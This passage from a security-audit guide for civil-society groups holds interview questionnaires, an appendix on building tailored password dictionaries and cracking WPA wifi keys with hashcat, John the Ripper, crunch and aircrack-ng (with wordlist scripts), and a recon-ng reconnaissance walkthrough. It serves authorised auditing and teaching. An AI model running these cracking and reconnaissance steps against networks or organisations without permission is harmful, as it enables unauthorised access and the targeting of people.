    • Video Equipment
    • Cameras
    • USB Dongles
    • Hard Drives
    • Servers
    • Audio Recorders
    • Web Cams
    • Wireless Routers
    • Other
  32. Other hardware that is important to the organization’s work? Please describe if needed.
  33. How important you think each of these hardware tools is for achieving the organization’s strategic objectives?
  34. I will now read a list of software tools you might be familiar with. From this list, could you please tell me about the three tools that are most important in the daily work of your organization?
    • Social media
    • Blogging Platforms
    • Tools for creating and managing pictures or videos
    • Cloud Based collaboration applications
    • Budgeting Software
    • Tools for building and managing websites
    • project management software
    • Anti-virus software
    • tools for managing databases
    • Graphic design or visualization software
    • software to manage sms or mobile communication for groups
    • circumvention software
    • other
  35. Other software that is important to the organization’s work? Please describe if needed.

  36. To your knowledge, how often do the below incidents occur in the geographic areas or issue areas in which your organization is active? Could you please tell me if you think they happen never, sometimes or often
    • The government lawfully intercepts information communicated by civil society or private persons
    • The government lawfully confiscates equipment because of the information it contains
    • Government, public officials, non-state actors, police or security forces use digital or mobile technology to identify and target individuals for arrest or violence
    • Government, public officials, non-state actors, police or security forces use digital or mobile technology to attack the reputations of individuals or organizations
  37. To your knowledge, how often do the below actors use digital or mobile technology to target or to identify individuals for arrest or violence? Do they use it never, sometimes, or often.
    • government or public officials
    • non-state actors (corporations, social groups)
    • police, security forces or paramilitary groups
  38. And how often would you say that these actors use digital or mobile technology to monitor or gather information on civil society activities? Never, sometimes, or often.
    • government or public officials
    • non-state actors (corporations, social groups)
    • police, security forces or paramilitary groups
  39. What do you feel are the most immediate and serious digital threats to the organization?
  40. How much risk do you feel each of these digital threats presents to your organization?
    • Online surveillance
    • DDOS (Distributed Denial of Service) Attack
    • Targeted for physical violence on the basis of digital activity
    • Data loss
    • Other.
  41. Do you feel that any of these threats place the physical security of your staff in danger?
  42. Do you feel that any of these threats place the physical security of your stakeholders in danger?
  43. Do you feel that any of these threats place the physical security of your beneficiaries in danger?
  44. In the last six months, have you or any of your civil society peers experienced any of the following?
    • Intimidation or threats of violence by public officials, police or security forces
    • Intimidation or threats of violence by private or non-state actors.
    • Threats of arrest or detention
    • Arrest
    • Threats of Torture.
    • Confiscation of equipment
    • Threats to administrative standing, such as stripping individuals of professional accreditation or organization of licenses
    • Other
  45. How has your organization responded to these threats?
    • Addressed the issue in the press/online
    • Told other organizations about the threat
    • Contacted the authorities
    • Trained staff to prevent and mitigate such threats in the future
    • Requested help from other organizations
    • Invested in hardware
    • raised funds
    • has not responded
    • other
  46. Has the organization taken any of the following steps to prepare against digital or physical threats?
    • Staff have been trained
    • There are specific plans in place for specific situations
    • Equipment and/or supplies have been made ready
    • Other
  47. Does the organization experience power outages in its office?
  48. Does the organization have access to the Internet in its offices?
  49. In the last month, has your organization lost access to the Internet for reasons other than power outages?

Management Only
  1. Is the manager aware that a test is about to be performed?
  2. What data would create the greatest risk to the organization if exposed, corrupted, or deleted?
Technical Only
  1. Are there any systems which could be characterized as fragile? (systems with tendencies to crash, older operating systems, or which are unpatched)
  2. Are testing and validation procedures to verify that business applications are functioning properly in place?
  3. Are Disaster Recovery Procedures in place for the application data?
  4. Are Change Management procedures in place?
  5. What is the mean time to repair systems outages?
  6. Is any system monitoring software in place?
  7. What are the most critical servers and applications?
  8. Do you use backups in your organization?
    • Are there any data/devices that are not backed up?
    • Are backups tested on a regular basis?
    • When was the last time the backups were restored?
  9. How many websites does your organization have?
  10. What are their URLs?
  11. Where are they hosted?
  12. How many wireless networks are in place at the organization?
  13. Is a guest wireless network used? If so:
  14. Does the guest network require authentication?
  15. What type of encryption is used on the wireless networks?
  16. Approximately how many clients will be using the wireless network?
  17. How many total IP addresses are being tested?
  18. How many internal IP addresses, if applicable?
  19. How many external IP addresses, if applicable?
  20. Are there any devices in place that may impact the results of audit scans such as a firewall, intrusion detection/prevention system, web application firewall, or load balancer?

Categories

Below are the categories each question fits within. Use this to help you reduce the information you obtained from the interview into manageable themes, insights, and implications.

Basic Information

5, 6, 8, 10, 11, 13, 14, 15, 24, 25, 7

Threat Information

58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68

Capacity

Capacity questions seek to reflect organizations’ readiness and likelihood to succeed in engaging with technology in their work. 88

23, 26, 27, 28, 34, 35, 36, 37, 38, 39, 40, 43, 45, 46, 29, 30, 31, 55, 9, 16, 17, 18, 19, 20

Challenge

Challenge questions seek to reflect the degree to which internal and external factors will complicate or inhibit the effective and safe uptake and use of technology. 89

41, 40, 42, 46, 47, 48, 69, 70, 71

Audit Scope

Scope questions explore what the client is looking to gain out of the audit, why the client is looking to have an audit performed against their environment, and whether or not they want certain types of tests performed during the audit. 90

44, 72, 49, 51, 50, 52

Network Audit Questions

90, 91, 92, 93, 81, 80, 79, 78, 77, 49, 74, 75, 76, 53, 54, 56, 57

Web Application Audit Questions

12, 82, 83, 84

Wireless Audit Questions

85, 86, 87, 88, 89

Device Audit

32, 33, 21

Data Audit

73

APPENDIX: Password Dictionaries

Password Dictionary Creation

Summary

This component provides resources and recommendations on cracking passwords: creating dictionaries, rules to mutate those dictionaries, and some basic use of the cracking tools themselves. This is a dangerous (and, without authorization, in many jurisdictions illegal) skill to use. Treat this section as a guide to which password "security myths" do not hold up against modern password cracking software, and use it only with permission and only in very specific situations, as a demonstration of what even a common laptop can do against weak passwords.

Description

Weak passwords are prevalent: even after hundreds of well-publicized global password breaches, "password" and "12345" remain among the most popular passwords. This exercise supports the auditor in building an effective dictionary and using it to attack non-personal and non-disruptive parts of an organization's infrastructure. Weak wifi passwords are a particular problem: the signal is often reachable from outside the office's physical boundary, yet the key grants full access to the private network.

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Approach

Instructions

Primarily for use in the Network Access component, building a password dictionary, understanding how to mutate it automatically, and running it against captured passwords is a useful skill to have, and a good way to explain why simple passwords are insecure. This Ars Technica article gives a good overview of iterative password cracking with a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many others exist. If there are tools you are more familiar or comfortable with, use them; the tools named here are by no means required. The only constraints are to be respectful and responsible, and to stay focused on the overall goals rather than getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. A collection of all English words, all words from the language of the organization being audited, combinations of those words, plus relevant keywords, addresses and years tends to crack most wifi passwords in a reasonable timeframe.

Begin with quick but often fruitful attacks and progress to more complex (and time consuming) ones. After an hour or two of password cracking, in-office time is better spent on other activities, so admit defeat and move on; see the Recommendations section for talking points on the levels of password cracking capability that exist in the world. You can continue working on passwords offline, overnight or post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as the main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you have already had to ask for the wifi password in order to connect to the Internet and update your dictionaries or tools. Larger password dictionaries in particular can be very large files, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity, maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (hunspell .dic files, such as those used by LibreOffice) into useful word lists. It is generally useful to always test with English in addition to the target language.

CloudCracker (https://www.cloudcracker.com/dictionaries.html) and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation

In addition, create a customized dictionary with words related to the subject, as revealed in the Remote Assessment research, including but not limited to the organization's name, address, issue areas and founding year.

For the organization "ExampleOrg", which has its offices at 123 Central St., Federal District, Countryzstan, does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
org
EO
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/12345/123456/1234567/12345678, and, based on field experience, four-digit years going back about 20 years in both the Gregorian (Western) and, if relevant, local calendar, plus the founding year of the organization. It's quite amazing how often a recent year is part of a wifi password; this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf
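The two dictionary-assembly steps described above (converting a spell-check dictionary into a word list, and generating ExampleOrg-style context keywords, years and common fragments) are small enough to script. The following Python helper is an added example, not part of SAFETAG and not the output of any tool named here. The hunspell-style .dic excerpt is constructed for the example, and the tokenization choices (CamelCase splitting of the name, a 20-year window of years) are this example's own rather than a SAFETAG rule.

```python
"""Assemble a password dictionary: spell-check words plus organisational context."""
import re
from typing import Iterable, List

# Constructed hunspell-style .dic excerpt for the example. Line 1 is the word
# count; entries may carry "/AFFIXFLAGS" and tab-separated morphology fields.
SAMPLE_DIC = """4
journalist/MS
rights
freedom/M\tpo:noun
Central/M
"""

# Common fragments recommended in the text above (qwerty and the 1234...8 runs).
COMMON_FRAGMENTS = ["qwerty", "1234", "12345", "123456", "1234567", "12345678"]


def words_from_hunspell_dic(text: str) -> List[str]:
    """Turn a hunspell/LibreOffice .dic file into a plain, lower-cased word list.

    Drops the leading count line, the "/flags" affix suffix and any tab-separated
    morphological fields, then de-duplicates.
    """
    lines = text.splitlines()
    if lines and lines[0].strip().isdigit():
        lines = lines[1:]
    words = set()
    for line in lines:
        entry = line.split("\t", 1)[0].split("/", 1)[0].strip().lower()
        if entry:
            words.add(entry)
    return sorted(words)


def context_keywords(org_name: str, address: str, keywords: Iterable[str],
                     founded: int, current_year: int, years_back: int = 20) -> List[str]:
    """Context-derived candidates for one organisation, as in the ExampleOrg list.

    Emits every token of the name and address, the name squashed to one token,
    CamelCase parts of the name ("ExampleOrg" -> "example", "org"), its acronym
    in upper and lower case, the founding year in four- and two-digit form, and
    every year from current_year back `years_back` years.
    """
    cands = set()
    name_tokens = re.findall(r"[A-Za-z0-9]+", org_name)
    for tok in name_tokens:
        cands.add(tok.lower())
        for part in re.findall(r"[A-Z]?[a-z]+|[0-9]+", tok):
            cands.add(part.lower())
    cands.add("".join(name_tokens).lower())
    acronym = "".join(p[0] for tok in name_tokens for p in re.findall(r"[A-Z][a-z]*", tok))
    if len(acronym) > 1:
        cands.update({acronym, acronym.lower()})
    cands.update(tok.lower() for tok in re.findall(r"[A-Za-z0-9]+", address))
    cands.update(kw.lower() for kw in keywords)
    cands.add(str(founded))
    cands.add(f"{founded % 100:02d}")
    cands.update(str(y) for y in range(current_year - years_back, current_year + 1))
    cands.update(COMMON_FRAGMENTS)
    return sorted(cands)


def merge_wordlists(*lists: Iterable[str]) -> List[str]:
    """Union of several lists, de-duplicated and sorted."""
    return sorted(set().union(*map(set, lists)))


def write_wordlist(path: str, words: Iterable[str]) -> int:
    """Write one candidate per line (the format john -w: and hashcat expect); returns the count."""
    words = list(words)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    spell = words_from_hunspell_dic(SAMPLE_DIC)
    ctx = context_keywords("ExampleOrg", "123 Central St., Federal District, Countryzstan",
                           ["human", "rights", "journo", "journalism"], 1992, 2015)
    for w in merge_wordlists(spell, ctx):
        print(w)
```

Pipe the output into a file and hand it to the combinator step below; the spell-check list for a whole language will be tens of thousands of words, so keep the context list separate and pair the small list with the large one rather than the large list with itself.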

Optional Further steps

Use CeWL to spider the organization's web properties and generate additional phrases. The list will need review, as some of the generated content is not very useful, but it is especially valuable when the site is in a language the auditor does not read fluently.

For passwords other than WPA keys, specific policies or patterns may help to focus your password dictionary further. PACK (Password Analysis and Cracking Toolkit) is "a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of already-cracked passwords, where it can detect patterns to help build new rules. Both password cracking tools discussed here (Hashcat and John the Ripper) are powerful and have slightly different abilities; the auditor should choose the one they prefer and/or the one with the features needed for this job.

Combinator Attack with scripting and Hashcat

One quick way to build a more complex password list is to pair the list with itself (a "combinator" attack), so that it includes an entry for each ordered pair of strings. A simple scripted version, which appends the unpaired words afterwards so single words are still tried:

 $ while read -r foo; do
 >   while read -r bar; do printf '%s%s\n' "$foo" "$bar"; done < pwdlist.txt
 > done < pwdlist.txt > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

(read -r and a printf format string keep words containing spaces, backslashes or % characters intact.)

Hashcat can do this in a live attack under its "combinator" mode (-a 1), and hashcat-utils (on Kali, /usr/share/hashcat-utils/combinator.bin) provides it as a standalone tool. This is a true cross product of the two lists, so the output has N x M entries for lists of N and M words; use it with caution, or pair one large dictionary with one small one.

For example, run this combination approach on your custom dictionary (combining it with itself creates candidates such as example92, journorights and exampleorgrights from the list above):

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is at its most powerful on a desktop with a capable GPU, but its wordlist manipulation utilities are useful regardless of hardware.

More References: (http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 , http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/ )

Word mutation with John the Ripper (JtR)

JtR is a powerful tool to use in combination with existing wordlists, and it can also apply common substitutions (a zero for the letter "o", for example). JtR can generate a static list of candidates for other programs (--stdout), or be run directly against a file of password hashes. JtR is weak at combining words within a wordlist, so apply your customizations and any combinator folding before handing the list to JtR.

You can add custom "rules" to drive these substitutions. A base set is included with JtR, and a much more powerful set is published by KoreLogic (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set (".chr" file) that uses password frequency data from large collections of real-world passwords to speed up JtR's incremental (brute force) mode. This PDF presentation has a good walkthrough of how John and KoreLogic's rules work.

Additional guides: http://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux

The bleeding-jumbo version of JtR combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules gives good descriptions of what each KoreLogic rule does. In bleeding-jumbo the rule names drop the "KoreLogicRules" prefix, which is why the examples below use the short names. BackReference provides a great example of rules usage.

Some particularly useful individual rulesets are:

    • AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation)
    • AddJustNumbers (adds 1-4 digits to the end of everything)
    • l33t (leet-speak combinations)

There are some built-in combinations of rulesets. For example, a bare --rules runs john's internal collection of default rules, --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

e.g. :

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP: create a dictionary containing just "blah" and run various rules against it to understand how each ruleset or combination behaves. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces: running the KoreLogic ruleset combination against that one-word dictionary yields 6,327,540 candidates from that single word.
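To make the PROTIP concrete, here is an added Python model (not SAFETAG's code and not John the Ripper's rule engine) of how rule sections multiply a dictionary. The three main rules approximate the AppendYears, AddJustNumbers and l33t rulesets named above; the leet substitution table, the "every subset of positions" expansion and the punctuation set for AppendCurrentYearSpecial are this example's assumptions, and john's real rules differ in detail. Run it with the one-word "blah" dictionary and watch the counts.

```python
"""Model of how john --rules sections multiply a dictionary (illustration, not JtR itself)."""
from typing import Callable, Iterable, List

Rule = Callable[[str], List[str]]

# Assumed leet substitution table; JtR's l33t rules use their own mapping.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"}


def append_years(word: str, first: int = 1900, last: int = 2019) -> List[str]:
    """AppendYears-style: word + every four-digit year in [first, last]."""
    return [f"{word}{y}" for y in range(first, last + 1)]


def append_current_year_special(word: str, first: int = 2000, last: int = 2019,
                                punct: str = "!@#$.") -> List[str]:
    """AppendCurrentYearSpecial-style: word + year + one punctuation char (punct set assumed)."""
    return [f"{word}{y}{p}" for y in range(first, last + 1) for p in punct]


def add_just_numbers(word: str, max_digits: int = 4) -> List[str]:
    """AddJustNumbers-style: word + every 1..max_digits digit string, leading zeros included."""
    out: List[str] = []
    for n in range(1, max_digits + 1):
        out.extend(f"{word}{i:0{n}d}" for i in range(10 ** n))
    return out


def leet(word: str) -> List[str]:
    """l33t-style: every non-empty subset of substitutable positions swapped (original excluded)."""
    positions = [i for i, c in enumerate(word) if c in LEET]
    out: List[str] = []
    for mask in range(1, 1 << len(positions)):
        chars = list(word)
        for bit, pos in enumerate(positions):
            if mask >> bit & 1:
                chars[pos] = LEET[chars[pos]]
        out.append("".join(chars))
    return out


def expand(words: Iterable[str], rules: Iterable[Rule]) -> List[str]:
    """Apply every rule to every word, like one --rules section.

    Duplicates are dropped, as john does, so the result can be slightly smaller
    than |words| x (outputs per rule).
    """
    rules = list(rules)
    seen, out = set(), []
    for w in words:
        for rule in rules:
            for cand in rule(w):
                if cand not in seen:
                    seen.add(cand)
                    out.append(cand)
    return out


def candidate_count(words: Iterable[str], rules: Iterable[Rule]) -> int:
    """Size of expand(words, rules) before de-duplication: the PROTIP's multiplication."""
    rules = list(rules)
    return sum(len(rule(w)) for w in words for rule in rules)


if __name__ == "__main__":
    one_word = ["blah"]
    for name, rule in [("AppendYears", append_years), ("AddJustNumbers", add_just_numbers),
                       ("l33t", leet), ("AppendCurrentYearSpecial", append_current_year_special)]:
        print(f"{name:26s} blah -> {candidate_count(one_word, [rule]):>8} candidates")
    # Stacking two sections multiplies again: 120 years x 11,110 digit strings.
    stacked = expand(expand(one_word, [append_years]), [add_just_numbers])
    print(f"AppendYears then AddJustNumbers: {len(stacked)} candidates")
```

The point to take from the numbers is that stacking is multiplicative: one word becomes 120 candidates after AppendYears and 1,333,200 after AddJustNumbers is applied on top, which is why a modest wordlist with a rich ruleset quickly exceeds what a laptop can test against WPA2 in an afternoon.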

Brute force, using John and crunch

JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can run a direct brute-force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough candidate generator: given enough time it will produce the password, but it is not particularly fast, even against simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, and so on. WPA/WPA2 pre-shared keys are a minimum of 8 and a maximum of 63 characters, and some wifi routers will accept any printable punctuation, but in practice people use only a few marks such as @#$. Crunch takes the character set as one literal string (it has no range syntax), so a run covering lower-case letters, digits and those four marks looks like:

$ /path/to/crunch 8 16 abcdefghijklmnopqrstuvwxyz0123456789@#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every combination of those 40 characters from 8 to 16 characters long and pipe the candidates to aircrack-ng (-a 2 selects WPA-PSK, -b names the target BSSID, -w - reads the wordlist from standard input). It will take a very, very, very long time: the 8-character candidates alone number 40^8, roughly 6.5 trillion, and each additional character multiplies that by 40. In practice, cap the length at what your hardware can actually cover (crunch 8 8 ...) and exhaust dictionary-plus-rules attacks first.

Recommendations

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and "brute-force attacks" in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters, or a passphrase that contains five or more relatively uncommon words.) The key should not contain common "phrases," especially from well-known literature like Shakespeare or religious texts, and should not include number sequences or phrases related to the organization, its employees or its work.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization's network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Sample Practice

For practice with any of these methods, you can use the wpa-Induction.pcap sample capture published on the Wireshark wiki.

Resources

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password-cracking systems are rated by the number of password guesses they make per second, and that rate depends heavily on the hash being attacked. For fast hashes, stock laptop computers without high-end graphics cards or other optimizations can guess about 2,500 passwords per second, more powerful desktop computers can test over a hundred million per second, and with graphics cards (GPUs) that rises to billions of passwords per second (https://en.wikipedia.org/wiki/Password_cracking). Deliberately slow, iterated hashes such as WPA2's PBKDF2 or bcrypt cut these rates by several orders of magnitude.

This website has a good explanation of how increasing the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi , but its numbers are very out of date: treat a basic laptop as capable of its "Class E" attacks and a desktop as capable of "Class F".
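The same arithmetic those calculators do, as an added example (not from the SAFETAG guide): the keyspace is the sum of charset^length over the lengths tried, and the expected cracking time is half that keyspace divided by the guess rate. The guess rates come from the figures quoted above for fast hashes; the WPA2-PSK rate and the 7776-word list size are assumptions (an order-of-magnitude GPU rate against PBKDF2, and a Diceware-sized word list) and are labelled as such in the code.

```python
# Added example (not from the SAFETAG guide): the arithmetic behind the
# brute-force and "Class E/F" estimates in this section, as a small calculator.
# Keyspace = sum of charset^length over the lengths tried; expected time
# = half the keyspace / guess rate. The fast-hash rates are the ones quoted in
# this section; the WPA2-PSK rate and the 7776-word list size are assumptions.
import math

SECONDS_PER_YEAR = 365 * 24 * 3600

RATES = {
    "stock laptop, fast hash": 2_500,
    "desktop, fast hash": 100_000_000,
    "GPU, fast hash": 1_000_000_000,
    "GPU, WPA2-PSK (assumed)": 500_000,   # PBKDF2 is deliberately slow
}

def keyspace(charset_size, min_len, max_len):
    """Candidates that `crunch <min_len> <max_len> <charset>` would emit."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def entropy_bits(candidates):
    """Equivalent strength in bits: log2 of the number of candidates."""
    return math.log2(candidates)

def crack_years(candidates, guesses_per_second, fraction=0.5):
    """Expected years to find the password; on average half the keyspace is searched."""
    return candidates * fraction / guesses_per_second / SECONDS_PER_YEAR

def estimate(candidates):
    """Years to crack on each platform in RATES, keyed by platform name."""
    return {name: crack_years(candidates, rate) for name, rate in RATES.items()}

# Policies and attacks discussed in this section.
SCENARIOS = {
    "crunch 8 16 over 40 symbols": keyspace(40, 8, 16),
    "8 lower-case letters": keyspace(26, 8, 8),
    "12 random printable ASCII": keyspace(95, 12, 12),
    "5 words from a 7776-word list": keyspace(7776, 5, 5),   # list size assumed
}

if __name__ == "__main__":
    for label, n in SCENARIOS.items():
        print(f"{label}: {entropy_bits(n):.0f} bits")
        for platform, years in estimate(n).items():
            print(f"    {platform:28s} {years:12.3g} years")
```

Running it shows why the Recommendations above hold: 12 random printable characters are about 79 bits and five words from a 7776-word list about 65 bits, both far out of reach, while 8 lower-case letters (about 38 bits) fall to a desktop in minutes against a fast hash. It also shows that the crunch 8 16 search is hopeless even on a GPU, so narrowing the character set or the length is not optional.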

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

APPENDIX: Password Survey

Password Survey

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

To how many people have you given your current password?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

In which positions in your password are the symbols?

Have you written down your current password?

If you wrote down your current password how is it protected (choose all that apply) ?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

APPENDIX: Recon-ng walkthrough

Installing Recon-ng

For full instructions, see the Recon-ng Getting Started Instructions

Using Recon-ng

NOTE: This guide is based upon the data flow documentation from the Recon-ng website

By pressing tab twice you can use auto-completion.

[recon-ng][default] >
add         exit        load        record      search      show        use
back        help        pdb         reload      set         spool       workspaces
del         keys        query       resource    shell       unset 

This also works partway through a command:

[recon-ng][default] > show
banner           credentials      hosts            locations        options          schema
companies        dashboard        keys             modules          ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         workspaces

Using recon modules

The recon modules are named in a very specific fashion to help the user understand the flow of data inside the tool. Modules use the syntax <methodology step>/<input table>-<output table>/<module>: the input table comes first, the output table second, and the module name itself is the tool or technique used to process the data. So recon/domains-hosts/brute_hosts takes domain names (websitename.org) as input and outputs hostnames (extranet.websitename.org, etc.). If you give just the module name, recon-ng can find it as long as the name is unambiguous (though tab completion doesn't help here) -- for example, use breachalarm works just as well as use recon/contacts-creds/breachalarm

You can also search modules by their inputs or outputs. search domains- displays all modules that take domain names as their input, and search -contacts displays all modules that outputs contact information.

Preparing

Set verbosity on for the rest of the guide so that you can see everything that happens (recommended when starting out).

[recon-ng][default] > set VERBOSE True

You can use auto completion to see all the possible keys you can add.

[recon-ng][websitename] > keys add
bing_api           facebook_secret    google_cse         jigsaw_username    pwnedlist_iv       twitter_api
builtwith_api      facebook_username  ipinfodb_api       linkedin_api       pwnedlist_secret   twitter_secret
facebook_api       flickr_api         jigsaw_api         linkedin_secret    shodan_api         virustotal_api
facebook_password  google_api         jigsaw_password    pwnedlist_api      sonar_api

Choose and add a key.

[recon-ng][default] > keys add bing_api TYPE_THE_KEY_VALUE_HERE
[*] Key 'bing_api' added.

You can list keys by using the command keys list

[recon-ng][default] > keys list

  +--------------------------------------------------------------------------------------+
  |        Name       |                              Value                               |
  +--------------------------------------------------------------------------------------+
  | bing_api          | W7AgqE2Zv9ZIxqMzhObF                                             |
  | builtwith_api     | 74797dd40f0157d7f2bef45f2c5f907a                                 |
  | facebook_api      |                                                                  |
  | facebook_password |                                                                  |
  | facebook_secret   |                                                                  |
  | facebook_username |                                                                  |
  | flickr_api        |                                                                  |
  | google_api        | ab997f70cd67c77de1fba7007ca6401f                                 |
  | google_cse        |                                                                  |
  | ipinfodb_api      | d047b271ffa9277a6b717ee7ded757d7                                 |
  | jigsaw_api        |                                                                  |
  | jigsaw_password   |                                                                  |
  | jigsaw_username   |                                                                  |
  | linkedin_api      |                                                                  |
  | linkedin_secret   |                                                                  |
  | pwnedlist_api     |                                                                  |
  | pwnedlist_iv      |                                                                  |
  | pwnedlist_secret  |                                                                  |
  | shodan_api        | 107ebcb9577779a7ee77212a6291eb67                                 |
  | sonar_api         |                                                                  |
  | twitter_api       | cf556fc775cf577c267b7c104c475097                                 |
  | twitter_secret    | fa0e557575455e1705ad719eee76c064                                 |
  | virustotal_api    | edecc7250f0717b2f7065a2cabbc47bf                                 |
  +--------------------------------------------------------------------------------------+

Reference the Creating API Keys section below for quick links to setting up popular APIs. Note that recon-ng stores these keys unencrypted in its own database under the user's home directory, so treat the auditor's laptop, and any spool or resource files written during a session, as sensitive.

NOTE: Sample Keys - working keys may have different lengths than the randomly generated numbers in this example.

First steps

NOTE: This walkthrough is using sample data. Results will vary widely depending on the organization you are working with.


[recon-ng][default] > workspaces add websitename
[recon-ng][websitename] > 
[recon-ng][websitename] > workspaces select default
[recon-ng][default] >
[recon-ng][default] > workspaces select websitename
[recon-ng][websitename] > 

Display possible seed information by using auto-completion.

[recon-ng][default] > add
companies        credentials      hosts            locations        ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         

We will only use the organization's name, one domain, two IP addresses (found by searching for other domains and pinging them; they go in the netblocks table) and two e-mail addresses of the organization we are looking at, so we will add those.

First, add the company name.

[recon-ng][websitename] > add companies
company (TEXT): Websitename
description (TEXT): 

Next, add the domain.

[recon-ng][default] > add domains websitename.org
[recon-ng][websitename] > show domains

  +--------------------------------+
  | rowid |     domain    | module |
  +--------------------------------+
  | 1     | websitename.org | base   |
  +--------------------------------+

[*] 1 rows returned

Next, add the contacts. We don't know much, but we will add what we know.

[recon-ng][websitename] > add contacts
first_name (TEXT): Bob
middle_name (TEXT):
last_name (TEXT): Smith
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > add contacts
first_name (TEXT): Carl
middle_name (TEXT):
last_name (TEXT): Johnson
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > 

Finally, add the IP addresses of their servers as netblocks.

[recon-ng][websitename] > add netblocks
netblock (TEXT): 174.154.167.69
[recon-ng][websitename] > add netblocks
netblock (TEXT): 96.127.170.121

Here it is in the database.

[recon-ng][websitename][shodan_net] > show netblocks

  +---------------------------------+
  | rowid |    netblock    | module |
  +---------------------------------+
  | 2     | 174.154.167.69 | base   |
  | 3     | 96.127.170.121 | base   |
  +---------------------------------+

Reconnaissance phase (netblocks example)

First, search for any modules that use netblocks as an input.

[recon-ng][websitename] > search netblocks-
[*] Searching for 'netblocks-'...

  Recon
  -----
    recon/netblocks-hosts/reverse_resolve
    recon/netblocks-hosts/shodan_net
    recon/netblocks-ports/census_2012

In the case of recon/netblocks-hosts/shodan_net we can see that the "shodan_net" module is a reconnaissance module that takes in netblocks and produces hosts.

Let's try it out.

